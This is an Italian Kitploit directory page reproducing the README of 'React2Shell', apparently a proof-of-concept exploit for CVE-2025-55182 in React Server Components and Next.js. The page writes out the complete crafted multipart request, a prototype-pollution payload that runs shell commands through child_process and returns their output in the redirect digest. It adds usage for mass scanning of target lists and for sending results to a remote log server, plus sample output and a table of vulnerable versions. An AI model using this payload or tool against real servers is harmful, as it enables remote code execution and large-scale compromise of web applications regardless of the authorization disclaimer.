Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
React2Shell-Exploit-CVE-2025-55182 — React2Shell è un exploit proof-of-concept per la CVE-2025-55182 che colpisce le implementazioni vulnerabili di React Server Components (RSC) in Next.js. | Kitploit
Strumenti/GitHubGitHub/indra-031/react2shell-exploit-cve-2025-55182
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubindra-031/react2shell-exploit-cve-2025-55182

React2Shell-Exploit-CVE-2025-55182

React2Shell è un exploit proof-of-concept per la CVE-2025-55182 che colpisce le implementazioni vulnerabili di React Server Components (RSC) in Next.js.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
127 giorni faNon ancora revisionato

💀 React2Shell Exploit — CVE-2025-55182

root@kitploit:~
██████╗ ███████╗ █████╗  ██████╗████████╗██████╗ ███████╗██╗  ██╗███████╗██╗     ██╗
██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝╚════██╗██╔════╝██║  ██║██╔════╝██║     ██║
██████╔╝█████╗  ███████║██║        ██║    █████╔╝███████╗███████║█████╗  ██║     ██║
██╔══██╗██╔══╝  ██╔══██║██║        ██║   ██╔═══╝ ╚════██║██╔══██║██╔══╝  ██║     ██║
██║  ██║███████╗██║  ██║╚██████╗   ██║   ███████╗███████║██║  ██║███████╗███████╗███████╗
╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝   ╚═╝   ╚══════╝╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝

🔥 Esecuzione Remota di Codice nei React Server Components

CVE-2025-55182

Scritto da INDRA


⚠️ Disclaimer

Questo progetto è fornito solo a scopo educativo, per la ricerca sulla sicurezza e per test di penetrazione autorizzati.

L'autore non si assume alcuna responsabilità per usi impropri o danni causati da questo software.

Utilizza questo exploit solo contro sistemi di tua proprietà o per i quali hai ricevuto esplicita autorizzazione al test.


📖 Descrizione

React2Shell è un exploit proof-of-concept per CVE-2025-55182 che colpisce le implementazioni vulnerabili di React Server Components (RSC) in Next.js.

L'exploit invia una richiesta multipart appositamente costruita che sfrutta il flusso di deserializzazione vulnerabile ed estrae l'output dei comandi tramite la risposta redirect digest dell'applicazione.

Quando l'exploit riesce, l'output del comando eseguito viene mostrato direttamente nel terminale.


✨ Caratteristiche

  • 🚀 Modalità Target Singolo
  • 🌍 Modalità Scansione di Massa
  • 🔄 Rilevamento Automatico di HTTP e HTTPS
  • ⚡ Esecuzione Multi-thread
  • 📝 Registrazione Locale Opzionale
  • 🌐 Server di Log Remoto Opzionale
  • 🎯 Output Pulito
  • 🛡 Verifica SSL Disattivata (per ambienti di test)
  • 📂 Rimozione dei Target Duplicati

📦 Requisiti

Python 3.8+

Installa le dipendenze:

root@kitploit:~
pip install requests urllib3

📁 Struttura del Progetto

root@kitploit:~
.
├── exploit.py
└── README.md

🔥 Versioni Vulnerabili

React


Next.js

Vulnerabili

  • 14.3.0-canary.77 e successive
  • 15.x
  • 16.x

Patchati

  • 15.0.5
  • 15.1.9
  • 15.2.6
  • 16.0.7

📨 Richiesta HTTP Utilizzata

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]

------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

🚀 Utilizzo

Mostra Aiuto

root@kitploit:~
python exploit.py -h

Scansiona un Singolo Target

root@kitploit:~
python exploit.py -u https://target.com

Scansiona Più Target

targets.txt

root@kitploit:~
target1.com
target2.com
target3.com

Esegui

root@kitploit:~
python exploit.py -f targets.txt

Salva i Risultati

root@kitploit:~
python exploit.py -u https://target.com -o results.txt

Invia i Risultati a un Server di Log Remoto

root@kitploit:~
python exploit.py -u https://target.com -l https://your-log-server.com

Tutto Insieme

root@kitploit:~
python exploit.py -f targets.txt -o results.txt -l https://your-log-server.com

📋 Opzioni della Riga di Comando


🖥 Output di Esempio

root@kitploit:~
🚀 Caricati 42 target (HTTP + HTTPS)

🔥 [VULNERABILE] https://target.com/

💀 Output del Comando →
uid=1000(node) gid=1000(node) groups=1000(node)

──────────────────────────────────────────────

⚙️ Come Funziona

  1. Legge i target
  2. Genera automaticamente gli URL HTTP e HTTPS
  3. Invia la richiesta multipart appositamente costruita
  4. Analizza il redirect digest
  5. Estrae l'output del comando
  6. Mostra l'exploit riuscito
  7. Salva opzionalmente i risultati localmente o da remoto

📌 Note

  • Testa automaticamente sia HTTP che HTTPS quando non viene fornito alcuno schema.
  • I target duplicati vengono rimossi automaticamente.
  • Utilizza 30 thread concorrenti.
  • Ignora i certificati SSL non validi.
  • Il timeout è impostato a 10 secondi.

❤️ Crediti

  • Sviluppo dell'Exploit: INDRA
  • CVE: CVE-2025-55182

⚖️ Avviso Legale

L'uso non autorizzato di questo software contro sistemi senza permesso potrebbe violare leggi locali, nazionali o internazionali.

L'autore non è responsabile per qualsiasi uso improprio.


⭐ Se questo progetto ti è stato utile per la tua ricerca, considera di mettere una stella.

Buona Caccia 🕷️

Scarica lo strumento
VersioneStato
19.0⚠ Vulnerabile
19.1.0⚠ Vulnerabile
19.1.1⚠ Vulnerabile
19.2.0⚠ Vulnerabile
19.0.1✅ Patchato
19.1.2✅ Patchato
19.2.1✅ Patchato
OpzioneDescrizione
-uURL del target
-fFile contenente i domini target
-oSalva i target vulnerabili localmente
-lInvia i risultati a un server di log remoto
-hMostra aiuto